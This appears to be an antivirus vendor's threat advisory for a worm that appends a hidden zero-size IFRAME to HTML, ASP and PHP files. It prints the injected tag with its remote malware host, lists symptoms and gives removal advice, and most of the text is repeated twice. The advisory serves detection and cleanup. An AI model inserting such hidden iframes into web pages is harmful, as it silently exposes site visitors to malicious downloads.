McAfee > Theat Center > Virus Detail Page

Overview

W32/Xiaoho.worm infects web-based files with the extensions .HTM; .HTML; ASP; .ASPX; or .PHP. These infected files (detected as W32/Xiaoho!htm) are modified such that when they're opened and rendered malicious content might be downloaded from remote web hosts.

Characteristics

Infected web-based files contain an appended HTML IFRAME (inline-frame) tag which, if rendered, will dynamically download content from a remote web host.

The IFRAME tag in this variant points to the following URL:

• http://xiaohao.yona.biz/[HIDDEN]

using the following syntax:

• iframe src= http://xiaohao.yona.biz/[HIDDEN] width=0 height=0 /iframe

At the time of writing, the referenced page doesn’t exist but we will monitor it to see if that changes!

Symptoms

- Increased size of such web-files.
   - In the case of this variant, files grew by 77 bytes.

 - Presence of IFRAME tags appended to such files (meaning HTML code appears beyond closing /HTML tag).

 - Unexpected HTTP traffic
   - If an infected file is loaded and rendered in an application, such as a web browser, potentially unexpected HTTP traffic will occur on the network. The destination of such traffic would be to the URL mentioned in the characteristics section of this description.

Method of Infection

Infection occurs after a system has been infected with the W32/Xiaoho.worm.

Please view the W32/Xiaoho.worm description for more information on this threat.

Removal

AVERT recommends to always use latest DATs and engine. This threat will be cleaned if you have this combination.

Additional Windows ME/XP removal considerations

Variants

Variants

N/A

All Information

Overview -

W32/Xiaoho.worm infects web-based files with the extensions .HTM; .HTML; ASP; .ASPX; or .PHP. These infected files (detected as W32/Xiaoho!htm) are modified such that when they're opened and rendered malicious content might be downloaded from remote web hosts.

Characteristics

Characteristics -

Infected web-based files contain an appended HTML IFRAME (inline-frame) tag which, if rendered, will dynamically download content from a remote web host.

The IFRAME tag in this variant points to the following URL:

• http://xiaohao.yona.biz/[HIDDEN]

using the following syntax:

• iframe src= http://xiaohao.yona.biz/[HIDDEN] width=0 height=0 /iframe

At the time of writing, the referenced page doesn’t exist but we will monitor it to see if that changes!

Symptoms

Symptoms -

- Increased size of such web-files.
   - In the case of this variant, files grew by 77 bytes.

 - Presence of IFRAME tags appended to such files (meaning HTML code appears beyond closing /HTML tag).

 - Unexpected HTTP traffic
   - If an infected file is loaded and rendered in an application, such as a web browser, potentially unexpected HTTP traffic will occur on the network. The destination of such traffic would be to the URL mentioned in the characteristics section of this description.

Method of Infection

Method of Infection -

Infection occurs after a system has been infected with the W32/Xiaoho.worm.

Please view the W32/Xiaoho.worm description for more information on this threat.

Removal -

Removal -

AVERT recommends to always use latest DATs and engine. This threat will be cleaned if you have this combination.

Additional Windows ME/XP removal considerations

Variants

Variants -

N/A